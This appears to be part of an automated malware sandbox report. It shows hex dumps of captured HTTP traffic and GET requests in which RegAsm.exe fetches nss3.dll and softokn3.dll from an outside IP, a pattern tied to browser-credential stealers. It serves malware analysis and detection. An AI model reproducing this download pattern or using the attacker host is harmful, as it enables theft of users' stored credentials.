                                                                                                                                                                                                          2024-04-10 06:56:35 UTC16384INData Raw: f7 0f b7 06 66 3b c1 74 0e 66 3b c2 74 09 8b 45 08 33 db 8b 30 eb 43 03 f7 6a 04 5b 89 75 f8 66 83 3e 28 89 5d f4 75 32 8b de 03 df 68 07 01 00 00 0f b7 03 50 ff 15 ac 72 06 10 59 59 85 c0 75 e9 0f b7 03 83 f8 5f 74 e1 89 5d f8 8b 5d f4 83 f8 29 75 06 8b 75 f8 83 c6 02 8b 45 0c 85 c0 74 02 89 30 8b 45 08 5f 89 30 8b c3 5e 5b c9 c3 55 8b ec 83 ec 48 a1 c0 41 06 10 33 c5 89 45 fc 6b 4d 18 07 33 d2 8b 45 10 53 8b 5d 14 56 8b 75 0c 89 75 d0 89 45 b8 89 55 bc 89 55 c4 89 55 c0 89 4d cc 57 8b fa 83 f9 23 7e 06 6a 23 59 89 4d cc 6a 30 58 89 13 89 53 04 66 39 06 75 12 c7 45 c4 01 00 00 00 83 c6 02 66 39 06 74 f8 89 75 d0 0f b7 0e b8 b8 2d 00 10 89 4d c8 8b 4d cc c7 45 d4 16 00 00 00 8b 75 c8 66 39 30 8b 75 d0 74 0b 83 c0 02 83 6d d4 01 75 ec 8b c2 85 c0 74 26 3b
                                                                                                                                                                                                          Data Ascii: f;tf;tE30Cj[uf>(]u2hPrYYu_t]])uuEt0E_0^[UHA3EkM3ES]VuuEUUUMW#~j#YMj0XSf9uEf9tu-MMEuf90utmut&;
                                                                                                                                                                                                          2024-04-10 06:56:35 UTC16384INData Raw: cc cc cc cc cc cc 55 8b ec 6a ff 68 09 e7 03 10 64 a1 00 00 00 00 50 a1 c0 41 06 10 33 c5 50 8d 45 f4 64 a3 00 00 00 00 e8 79 7b 00 00 50 e8 71 d8 ff ff 59 8b 40 0c 8b 4d f4 64 89 0d 00 00 00 00 59 c9 c3 cc cc 55 8b ec 83 79 38 00 8b 45 08 75 03 83 c8 04 ff 75 0c 50 e8 28 00 00 00 5d c2 08 00 cc cc cc cc 55 8b ec 6a 00 ff 75 08 e8 13 00 00 00 5d c2 04 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 8b 45 08 83 ec 1c 83 e0 17 89 41 0c 8b 49 10 56 23 c8 74 43 80 7d 0c 00 75 42 f6 c1 04 74 07 be 78 54 00 10 eb 0f be 90 54 00 10 f6 c1 02 75 05 be a8 54 00 10 8d 45 f8 6a 01 50 e8 f7 13 00 00 59 59 50 56 8d 4d e4 e8 bc e2 ff ff 68 a4 1a 04 10 8d 45 e4 50 eb 09 5e c9 c2 08 00 6a 00 6a 00 e8 f0 93 02 00 cc 53 57 8b f9 83 7f 4c 00 75 04 33 db eb 24 56 e8
                                                                                                                                                                                                          Data Ascii: UjhdPA3PEdy{PqY@MdYUy8EuuP(]Uju]UEAIV#tC}uBtxTTuTEjPYYPVMhEP^jjSWLu3$V
                                                                                                                                                                                                          2024-04-10 06:56:35 UTC16384INData Raw: 83 c4 10 c6 04 1e 00 83 f8 10 72 0b 40 50 ff 37 e8 54 95 ff ff 59 59 89 37 8b c7 5f 5e 5b c9 c2 0c 00 e8 b3 be ff ff cc 55 8b ec 83 ec 0c 8b 55 08 b8 ff ff ff 7f 53 8b d9 56 57 8b 4b 10 2b c1 89 4d fc 3b c2 72 69 8b 43 14 8d 3c 11 57 8b cb 89 45 f4 e8 88 b1 ff ff 8b f0 8d 4e 01 51 e8 b2 94 ff ff 59 ff 75 18 89 7b 10 8d 4d 0c ff 75 14 8b 7d f4 89 45 f8 89 73 14 ff 75 10 ff 75 fc 83 ff 10 72 17 8b 33 56 50 e8 6b 03 00 00 8d 47 01 50 56 e8 d2 94 ff ff 59 59 eb 07 53 50 e8 56 03 00 00 8b 45 f8 5f 89 03 8b c3 5e 5b c9 c2 14 00 e8 25 be ff ff cc 55 8b ec 83 ec 10 8b 55 08 b8 ff ff ff 7f 53 8b d9 56 57 8b 4b 10 2b c1 89 4d f0 3b c2 0f 82 8f 00 00 00 8b 43 14 8d 3c 11 57 8b cb 89 45 fc e8 f6 b0 ff ff 8b f0 8d 4e 01 51 e8 20 94 ff ff 83 7d fc 10 59 0f be 4d 14 89
                                                                                                                                                                                                          Data Ascii: r@P7TYY7_^[UUSVWK+M;riC<WENQYu{Mu}Esuur3VPkGPVYYSPVE_^[%UUSVWK+M;C<WENQ }YM
                                                                                                                                                                                                          2024-04-10 06:56:35 UTC16384INData Raw: 4d d4 53 33 c0 03 04 cb 52 13 7c cb 04 56 57 50 e8 f1 02 02 00 5b 8b 5d 08 8b f9 8b 4d d4 8b 75 d8 89 54 cb 04 8b 55 e8 89 04 cb 83 e9 01 89 4d d4 79 cf 5f 5e 5b c9 c3 55 8b ec 51 56 8b 75 14 33 d2 85 f6 7e 5f 53 8b 5d 08 29 5d 10 57 8b fb 89 75 fc 8b 5d 10 8b 0c 3b 03 0f 8b 44 3b 04 13 47 04 03 ca 89 0f 8d 7f 08 83 d0 00 8b d0 89 57 fc 83 67 fc 00 83 ee 01 75 dc 0b c6 8b 5d 08 74 22 8b 4d fc 3b 4d 0c 7d 1a 01 14 cb 8b 54 cb 04 13 d6 33 f6 89 54 cb 04 8b c2 21 74 cb 04 41 0b c6 75 e1 5f 5b 5e c9 c3 55 8b ec 8b 55 08 56 8b 75 0c 83 c2 f8 8d 14 f2 8b 02 0b 42 04 75 0b 8d 52 f8 4e 8b 0a 0b 4a 04 74 f5 8b c6 5e 5d c3 55 8b ec 53 56 33 db 33 f6 39 5d 0c 7e 30 57 8b 7d 08 ff 75 14 ff 75 10 ff 74 f7 04 ff 34 f7 e8 73 03 02 00 03 c3 89 04 f7 83 d2 00 8b da 89 5c
                                                                                                                                                                                                          Data Ascii: MS3R|VWP[]MuTUMy_^[UQVu3~_S])]Wu];D;GWgu]t"M;M}T3T!tAu_[^UUVuBuRNJt^]USV339]~0W}uut4s\
                                                                                                                                                                                                          2024-04-10 06:56:35 UTC16384INData Raw: 89 75 fc 89 46 04 c7 06 7c 69 00 10 83 66 08 00 ff 15 d0 72 06 10 6a 00 89 46 08 ff 15 90 71 06 10 59 8b c6 5e c9 c2 08 00 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 51 8b 45 0c 56 8b f1 89 75 fc 89 46 04 c7 06 e8 65 00 10 83 66 08 00 ff 15 d0 72 06 10 6a 00 89 46 08 ff 15 90 71 06 10 59 8b c6 5e c9 c2 08 00 56 8b f1 ff 76 0c c7 06 4c 68 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 5e c3 56 8b f1 ff 76 0c c7 06 8c 66 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc 56 8b f1 c7 06 50 69 00 10 e8 e2 71 00 00 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc cc cc cc 56 8b f1 c7 06 90 67 00 10 e8 c2 71 00 00 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc cc cc cc 56 8b f1 ff 76 08 c7 06 7c 69 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10
                                                                                                                                                                                                          Data Ascii: uF|ifrjFqY^UQEVuFefrjFqY^VvLhqY(R^VvfqY(R^VPiq(R^Vgq(R^Vv|iqY(R
                                                                                                                                                                                                          2024-04-10 06:56:36 UTC16384INData Raw: 80 7f 04 00 75 07 8b cf e8 85 26 00 00 0f b7 47 06 50 ff b5 74 ff ff ff e8 9a a8 ff ff 59 59 83 f8 0a 73 3c 8a 80 2c 6a 00 10 8b 4d 8c 88 85 64 ff ff ff ff b5 64 ff ff ff e8 5f 18 ff ff 8b 4d d8 8d 45 d8 83 fb 10 72 02 8b c1 80 3c 30 7f 74 4c 8d 45 d8 83 fb 10 72 02 8b c1 fe 04 30 eb 3a 8d 45 d8 83 fb 10 72 03 8b 45 d8 80 3c 30 00 74 45 80 7f 04 00 0f b7 47 06 75 0b 8b cf e8 10 26 00 00 0f b7 47 06 66 3b 85 60 ff ff ff 75 27 6a 00 8d 4d d8 e8 04 18 ff ff 46 8b 5d ec 8b cf e8 24 11 00 00 ff 75 98 8b cf e8 de 72 00 00 84 c0 0f 84 4a ff ff ff 8b 5d 90 85 f6 74 13 83 7d ec 10 8d 45 d8 72 03 8b 45 d8 80 3c 30 00 7e 52 46 8a 45 a7 83 7d d4 10 8d 55 c0 72 03 8b 55 c0 84 c0 75 49 85 f6 74 5e 8a 0a 80 f9 7f 74 57 83 ee 01 74 11 83 7d ec 10 8d 45 d8 72 03 8b 45 d8
                                                                                                                                                                                                          Data Ascii: u&GPtYYs<,jMdd_MEr<0tLEr0:ErE<0tEGu&Gf;`u'jMF]$urJ]t}ErE<0~RFE}UrUuIt^tWt}ErE


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          21192.168.2.44976195.217.212.1394437652C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          2024-04-10 06:56:37 UTC218OUTGET /nss3.dll HTTP/1.1
                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0
                                                                                                                                                                                                          Host: 95.217.212.139
                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                          2024-04-10 06:56:38 UTC248INHTTP/1.1 200 OK
                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                          Date: Wed, 10 Apr 2024 06:56:37 GMT
                                                                                                                                                                                                          Content-Type: application/octet-stream
                                                                                                                                                                                                          Content-Length: 2046288
                                                                                                                                                                                                          Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          ETag: "6315a9f4-1f3950"
                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                          2024-04-10 06:56:38 UTC16136INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00
                                                                                                                                                                                                          Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@
                                                                                                                                                                                                          2024-04-10 06:56:38 UTC16384INData Raw: 89 c2 69 f3 90 01 00 00 29 f0 83 e2 03 66 85 d2 0f 94 c2 66 85 ff 0f 95 c6 20 d6 66 85 c0 0f 94 c0 08 f0 0f b6 c0 8d 04 40 8b 55 f0 0f be 84 82 20 7c 1a 10 89 41 10 8a 41 1a fe c8 0f b6 c0 ba 06 00 00 00 0f 49 d0 88 51 1a e9 f7 fe ff ff 83 c2 e8 89 51 0c 8b 41 10 89 45 f0 8b 71 14 40 89 41 10 66 ff 41 1c 0f b7 41 18 a8 03 0f 94 c3 69 f8 29 5c 00 00 8d 97 1c 05 00 00 66 c1 ca 02 0f b7 d2 81 fa 8f 02 00 00 0f 93 c2 20 da 81 c7 10 05 00 00 66 c1 cf 04 0f b7 ff 81 ff a3 00 00 00 0f 92 c6 08 d6 0f b6 d6 8d 14 52 0f be 94 96 20 7c 1a 10 39 55 f0 7c 26 89 f7 c7 41 10 01 00 00 00 8d 56 01 89 51 14 83 fe 0b 7c 12 c7 41 14 00 00 00 00 40 66 89 41 18 66 c7 41 1c 00 00 8a 41 1a fe c0 31 d2 3c 07 0f b6 c0 0f 4d c2 88 41 1a e9 51 fe ff ff c7 41 14 0b 00 00 00 8b 51 18
                                                                                                                                                                                                          Data Ascii: i)ff f@U |AAIQQAEq@AfAAi)\f fR |9U|&AVQ|A@fAfAA1<MAQAQ
                                                                                                                                                                                                          2024-04-10 06:56:38 UTC16384INData Raw: 7f 06 00 74 69 31 db 8b 44 9f 14 be 48 01 1d 10 85 c0 74 02 8b 30 68 d3 fe 1b 10 56 e8 f7 5b 19 00 83 c4 08 85 c0 b8 79 64 1c 10 0f 45 c6 8b 4f 10 0f b6 0c 19 f6 c1 02 ba 98 dc 1c 10 be 48 01 1d 10 0f 44 d6 f6 c1 01 b9 b1 de 1c 10 0f 44 ce 50 52 51 68 7f a0 1b 10 8d 44 24 60 50 e8 d6 b7 06 00 83 c4 14 43 0f b7 47 06 39 c3 72 99 8b 44 24 60 8d 48 01 3b 4c 24 58 0f 83 b7 03 00 00 89 4c 24 60 8b 4c 24 54 c6 04 01 29 eb 25 8b 44 24 04 8b 4c 24 08 8b 44 81 10 0f be 08 8d 54 24 50 51 ff 70 20 68 2c e2 1c 10 52 e8 89 b7 06 00 83 c4 10 f6 44 24 64 07 0f 85 4b 03 00 00 8b 44 24 54 85 c0 74 21 8b 4c 24 60 c6 04 08 00 83 7c 24 5c 00 74 12 f6 44 24 65 04 75 0b 8d 4c 24 50 e8 d4 68 06 00 eb 04 8b 44 24 54 89 44 24 18 8b 45 08 8b 80 a0 00 00 00 83 e0 0c 83 f8 08 0f 85
                                                                                                                                                                                                          Data Ascii: ti1DHt0hV[ydEOHDDPRQhD$`PCG9rD$`H;L$XL$`L$T)%D$L$DT$PQp h,RD$dKD$Tt!L$`|$\tD$euL$PhD$TD$E
                                                                                                                                                                                                          2024-04-10 06:56:38 UTC16384INData Raw: 11 1e 10 77 26 8b 35 38 11 1e 10 85 f6 74 15 8b 0d 78 e0 1d 10 81 f9 80 c2 12 10 75 7b 56 ff 15 68 cc 1d 10 89 f8 5e 5f 5b 5d c3 a3 30 11 1e 10 eb d3 a3 0c 11 1e 10 eb b9 89 3d 20 11 1e 10 e9 54 ff ff ff 31 ff eb dc 8b 0d 40 e0 1d 10 ff 15 00 40 1e 10 57 ff d1 83 c4 04 eb ca ff 15 00 40 1e 10 56 ff d1 83 c4 04 e9 0b ff ff ff 89 f7 c1 ff 1f 29 f1 19 f8 31 d2 39 0d e4 10 1e 10 19 c2 7d 27 c7 05 50 11 1e 10 00 00 00 00 e9 20 ff ff ff 31 ff e9 6d ff ff ff ff 15 00 40 1e 10 56 ff d1 83 c4 04 e9 7b ff ff ff c7 05 50 11 1e 10 01 00 00 00 8b 1d 38 11 1e 10 85 db 74 2e 8b 0d 78 e0 1d 10 ff 15 00 40 1e 10 53 ff d1 83 c4 04 8b 1d 38 11 1e 10 85 db 74 12 8b 0d 70 e0 1d 10 ff 15 00 40 1e 10 53 ff d1 83 c4 04 a1 4c 11 1e 10 8b 0d 48 11 1e 10 89 ca 09 c2 0f 84 b1 fe ff
                                                                                                                                                                                                          Data Ascii: w&58txu{Vh^_[]0= T1@@W@V)19}'P 1m@V{P8t.x@S8tp@SLH
                                                                                                                                                                                                          2024-04-10 06:56:38 UTC16384INData Raw: 24 08 8b 70 44 8b 06 85 c0 0f 84 81 fd ff ff 8b 48 04 ff 15 00 40 1e 10 56 ff d1 83 c4 04 c7 06 00 00 00 00 e9 67 fd ff ff 8b 44 24 08 8b 70 40 8b 06 85 c0 74 2d 8b 4c 24 08 80 79 0d 00 75 11 8b 48 20 ff 15 00 40 1e 10 6a 01 56 ff d1 83 c4 08 8b 44 24 08 80 78 12 05 74 08 8b 44 24 08 c6 40 12 01 8b 4c 24 08 8a 41 0c 88 41 13 e9 13 fe ff ff 8b 44 24 08 8b 30 8b 4e 1c 85 c9 0f 84 88 fa ff ff 8b 44 24 08 8b b8 ec 00 00 00 ff 15 00 40 1e 10 6a 00 57 56 ff d1 83 c4 0c 89 44 24 0c e9 72 f6 ff ff 8b 4c 24 08 89 81 a0 00 00 00 e9 f7 f9 ff ff 8b 48 04 ff 15 00 40 1e 10 56 ff d1 83 c4 04 c7 06 00 00 00 00 e9 26 fa ff ff 31 f6 46 e9 d2 fc ff ff 31 db f6 44 24 1c 01 0f 84 40 fe ff ff 68 40 7e 1c 10 68 83 e4 00 00 68 14 dd 1b 10 68 78 fc 1b 10 6a 0e e8 0a 8f 02 00 83
                                                                                                                                                                                                          Data Ascii: $pDH@VgD$p@t-L$yuH @jVD$xtD$@L$AAD$0ND$@jWVD$rL$H@V&1F1D$@h@~hhhxj
                                                                                                                                                                                                          2024-04-10 06:56:38 UTC16384INData Raw: 6f 8b 7d 0c 89 54 24 04 8b 0d 30 e4 1d 10 8b 45 08 8b 40 08 89 04 24 ff 15 00 40 1e 10 8d 44 24 10 50 8d 44 24 10 50 56 57 ff 74 24 10 ff d1 85 c0 0f 84 92 00 00 00 8b 44 24 0c 85 c0 8b 54 24 04 74 42 29 c6 72 3e 01 c2 83 d3 00 89 54 24 18 89 d9 81 e1 ff ff ff 7f 89 4c 24 1c 01 c7 85 f6 7f a2 8b 44 24 24 85 c0 0f 85 92 00 00 00 31 ff 8b 4c 24 28 31 e9 e8 9d 64 13 00 89 f8 8d 65 f4 5e 5f 5b 5d c3 8b 0d 8c e2 1d 10 ff 15 00 40 1e 10 ff d1 89 c2 8b 45 08 89 50 14 83 fa 70 74 05 83 fa 27 75 3f bf 0d 00 00 00 b9 0d 00 00 00 68 ee b2 00 00 8b 45 08 ff 70 1c 68 65 8a 1c 10 e8 c4 1e 14 00 83 c4 0c eb a7 8d 4c 24 24 8d 54 24 08 e8 12 20 14 00 85 c0 0f 85 2a ff ff ff 8b 54 24 08 eb b1 bf 0a 03 00 00 b9 0a 03 00 00 68 f3 b2 00 00 8b 45 08 ff 70 1c 68 20 85 1c 10 eb
                                                                                                                                                                                                          Data Ascii: o}T$0E@$@D$PD$PVWt$D$T$tB)r>T$L$D$$1L$(1de^_[]@EPpt'u?hEpheL$$T$ *T$hEph
                                                                                                                                                                                                          2024-04-10 06:56:38 UTC16384INData Raw: 68 7c ec 8b 44 24 0c 89 46 68 83 7c 24 04 01 75 72 8b 56 64 8d 1c 40 c1 e3 04 83 7c 1a 1c 00 74 4b 8b 4e 48 8b 01 85 c0 74 42 3d 58 00 1a 10 75 34 8b 86 a8 00 00 00 8b be ac 00 00 00 83 c0 04 83 d7 00 89 74 24 04 89 d6 8b 54 1a 18 0f af fa f7 e2 01 fa 52 50 51 e8 8c 45 12 00 89 f2 8b 74 24 10 83 c4 0c 8b 44 1a 18 89 46 38 31 ff 8b 4c 24 30 31 e9 e8 9f 24 13 00 89 f8 8d 65 f4 5e 5f 5b 5d c3 89 74 24 04 8b 86 e8 00 00 00 89 44 24 08 85 c0 0f 84 88 01 00 00 83 7c 24 0c 00 0f 84 ac 00 00 00 8b 44 24 04 8b 70 64 85 f6 0f 84 9d 00 00 00 8b 44 24 0c 48 8d 3c 40 c1 e7 04 8b 44 3e 14 89 44 24 0c b9 00 02 00 00 31 d2 e8 56 3e ff ff 89 44 24 18 85 c0 0f 84 ce 02 00 00 8d 04 3e 89 44 24 14 8d 04 3e 83 c0 14 89 44 24 08 8b 5c 24 18 89 d8 83 c0 04 68 fc 01 00 00 6a 00
                                                                                                                                                                                                          Data Ascii: h|D$Fh|$urVd@|tKNHtB=Xu4t$TRPQEt$DF81L$01$e^_[]t$D$|$D$pdD$H<@D>D$1V>D$>D$>D$\$hj
                                                                                                                                                                                                          2024-04-10 06:56:38 UTC16384INData Raw: 00 00 00 8b 99 48 01 00 00 85 db 75 6b 8b 99 44 01 00 00 85 db 75 7b ff 81 40 01 00 00 8a 5d f3 88 d8 50 e8 d0 ca 11 00 83 c4 04 89 c3 85 c0 0f 84 a7 00 00 00 57 ff 75 e4 53 e8 0f 1c 18 00 83 c4 0c c6 04 3b 00 8d 04 b6 8b 4d ec 8d 04 81 83 c0 0c 89 18 0f b6 0b 80 b9 7a f8 19 10 00 78 4a 8b 4d e8 80 b9 d0 00 00 00 02 0f 83 83 00 00 00 83 c4 10 5e 5f 5b 5d c3 8b 03 89 81 48 01 00 00 e9 50 ff ff ff 8b 03 89 81 4c 01 00 00 e9 43 ff ff ff 8b 03 89 81 44 01 00 00 e9 36 ff ff ff ff 81 3c 01 00 00 e9 73 ff ff ff 80 f9 5b 0f b6 c9 ba 5d 00 00 00 0f 45 d1 89 55 ec 31 f6 46 89 df 8a 0c 33 3a 4d ec 74 06 88 0f 46 47 eb f2 8b 4d ec 38 4c 33 01 74 2d c6 07 00 eb 84 8d 04 b6 8b 4d ec 8d 04 81 83 c0 0c c7 00 00 00 00 00 e9 6d ff ff ff 8b 10 8b 4d e8 83 c4 10 5e 5f 5b 5d
                                                                                                                                                                                                          Data Ascii: HukDu{@]PWuS;MzxJM^_[]HPLCD6<s[]EU1F3:MtFGM8L3t-MmM^_[]
                                                                                                                                                                                                          2024-04-10 06:56:38 UTC16384INData Raw: f6 ff ff 8b 57 10 85 d2 74 09 8b 4c 24 20 e8 75 c2 ff ff 8b 7c 24 0c c7 47 10 00 00 00 00 e9 98 f6 ff ff 8b 06 89 81 44 01 00 00 e9 e3 f9 ff ff ff 81 3c 01 00 00 e9 80 fc ff ff 8b 44 24 14 80 b8 d0 00 00 00 00 0f 85 f3 fb ff ff 8b 44 24 20 8b 40 10 8b 4c 38 0c 83 79 48 00 0f 85 de fb ff ff ff 34 38 68 b4 e0 1c 10 ff 74 24 1c e8 06 09 00 00 83 c4 0c e9 c5 fb ff ff 8b 4c 24 1c e9 ae fd ff ff 8a 80 08 f7 19 10 3a 83 08 f7 19 10 0f 84 02 fa ff ff e9 c9 f9 ff ff 8b 44 24 20 80 b8 b1 00 00 00 00 0f 84 47 04 00 00 68 48 01 1d 10 ff 74 24 18 e8 5f 2a 01 00 83 c4 08 e9 33 f7 ff ff 8b 44 24 0c 80 48 1e 01 66 83 78 22 00 0f 8e a5 f5 ff ff 31 c9 b8 0e 00 00 00 8b 54 24 0c 8b 52 04 8b 74 02 f6 89 f7 c1 ef 04 83 e7 0f 83 ff 01 74 09 85 ff 75 0a e9 69 03 00 00 c6 44 02
                                                                                                                                                                                                          Data Ascii: WtL$ u|$GD<D$D$ @L8yH48ht$L$:D$ GhHt$_*3D$Hfx"1T$RttuiD
                                                                                                                                                                                                          2024-04-10 06:56:38 UTC16384INData Raw: c7 44 24 24 00 00 00 00 e9 0b f1 ff ff 8b 44 24 0c 8b 40 10 8b 40 1c 8b 4c 24 08 3b 41 3c 0f 84 95 ea ff ff 8b 7c 24 08 ff 37 68 27 f8 1c 10 ff 74 24 0c e8 e0 ea 00 00 83 c4 0c c7 44 24 24 00 00 00 00 e9 a2 f0 ff ff 68 48 e4 1b 10 8b 7c 24 08 57 e8 c1 ea 00 00 83 c4 08 be 0b 00 00 00 68 40 7e 1c 10 68 14 ce 01 00 68 40 bb 1b 10 68 78 fc 1b 10 56 e8 8f 4f 01 00 83 c4 14 89 77 0c c7 44 24 1c 00 00 00 00 e9 83 f8 ff ff 66 ba 1e 00 31 c0 85 c9 0f 85 54 f1 ff ff 31 d2 e9 5b f1 ff ff 31 ff 66 ba 28 00 be ff 0f 00 00 89 cb 31 c0 83 c2 28 89 f9 0f a4 d9 1c c1 e8 04 39 de bb 00 00 00 00 19 fb 89 cb 89 c7 0f 83 f2 f0 ff ff eb df a9 fd ff ff ff 74 65 31 f6 46 b8 ec bb 1b 10 e9 c1 fd ff ff 31 c0 e9 85 f2 ff ff c7 44 24 18 00 00 00 00 e9 36 f8 ff ff 8b 40 14 e9 d1 e9
                                                                                                                                                                                                          Data Ascii: D$$D$@@L$;A<|$7h't$D$$hH|$Wh@~hh@hxVOwD$f1T1[1f(1(9te1F1D$6@


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          22192.168.2.44976295.217.212.1394437652C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          2024-04-10 06:56:40 UTC222OUTGET /softokn3.dll HTTP/1.1
                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0
                                                                                                                                                                                                          Host: 95.217.212.139
                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                          2024-04-10 06:56:40 UTC246INHTTP/1.1 200 OK
                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                          Date: Wed, 10 Apr 2024 06:56:40 GMT
                                                                                                                                                                                                          Content-Type: application/octet-stream
                                                                                                                                                                                                          Content-Length: 257872
                                                                                                                                                                                                          Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          ETag: "6315a9f4-3ef50"
                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                          2024-04-10 06:56:40 UTC16138INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00
                                                                                                                                                                                                          Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSw
                                                                                                                                                                                                          2024-04-10 06:56:40 UTC16384INData Raw: ff 89 85 f4 fe ff ff c7 85 f8 fe ff ff 04 00 00 00 8d 85 f0 fe ff ff 6a 01 50 53 57 e8 85 af 00 00 83 c4 10 89 c6 85 c0 75 3f 8b 85 ec fe ff ff 83 c0 fd 83 f8 01 77 25 be 30 00 00 00 83 3d 28 9a 03 10 00 75 23 83 3d 50 90 03 10 00 74 0e be 01 01 00 00 f6 05 20 9a 03 10 01 74 0c 53 57 e8 e2 b9 00 00 83 c4 08 89 c6 83 3d 2c 9a 03 10 00 0f 84 5e ff ff ff 8b 85 ec fe ff ff 83 c0 fe 83 f8 02 0f 87 4c ff ff ff 56 53 57 68 85 6b 03 10 68 00 01 00 00 8d 85 f0 fe ff ff 50 ff 15 1c 7c 03 10 83 c4 18 e9 2a ff ff ff cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 81 ec 08 01 00 00 a1 14 90 03 10 31 e8 89 45 f0 c7 85 ec fe ff ff 00 00 00 00 be 30 00 00 00 83 3d 28 9a 03 10 00 74 17 8b 4d f0 31 e9 e8 28 8b 02 00 89 f0 81 c4 08 01 00 00 5e 5f 5b 5d c3 8b 5d 0c c7
                                                                                                                                                                                                          Data Ascii: jPSWu?w%0=(u#=Pt tSW=,^LVSWhkhP|*USWV1E0=(tM1(^_[]]
                                                                                                                                                                                                          2024-04-10 06:56:40 UTC16384INData Raw: ff 83 c4 10 85 c0 0f 85 6b 03 00 00 57 e8 c4 9d ff ff 83 c4 04 ff 75 e8 53 57 e8 f7 9d ff ff 83 c4 0c ff 75 e8 8d 45 e8 50 53 57 e8 26 9e ff ff 83 c4 10 85 c0 0f 85 3c 03 00 00 8b 4d c8 83 c1 01 8b 75 e4 8b 45 dc 01 f0 3b 4d c0 0f 85 6c ff ff ff 31 f6 e9 20 03 00 00 31 f6 ff 35 30 9a 03 10 ff 15 f0 7b 03 10 83 c4 04 a1 34 9a 03 10 85 c0 74 15 6a 01 50 e8 57 4e 02 00 83 c4 08 c7 05 34 9a 03 10 00 00 00 00 a1 38 9a 03 10 85 c0 74 15 6a 01 50 e8 39 4e 02 00 83 c4 08 c7 05 38 9a 03 10 00 00 00 00 a1 3c 9a 03 10 85 c0 74 15 6a 01 50 e8 1b 4e 02 00 83 c4 08 c7 05 3c 9a 03 10 00 00 00 00 56 e8 e8 4d 02 00 83 c4 04 a3 34 9a 03 10 8b 47 38 a3 40 9a 03 10 8b 47 28 a3 44 9a 03 10 8b 47 2c a3 48 9a 03 10 8d 47 04 50 e8 bf 4d 02 00 83 c4 04 a3 38 9a 03 10 ff 75 0c e8
                                                                                                                                                                                                          Data Ascii: kWuSWuEPSW&<MuE;Ml1 150{4tjPWN48tjP9N8<tjPN<VM4G8@G(DG,HGPM8u
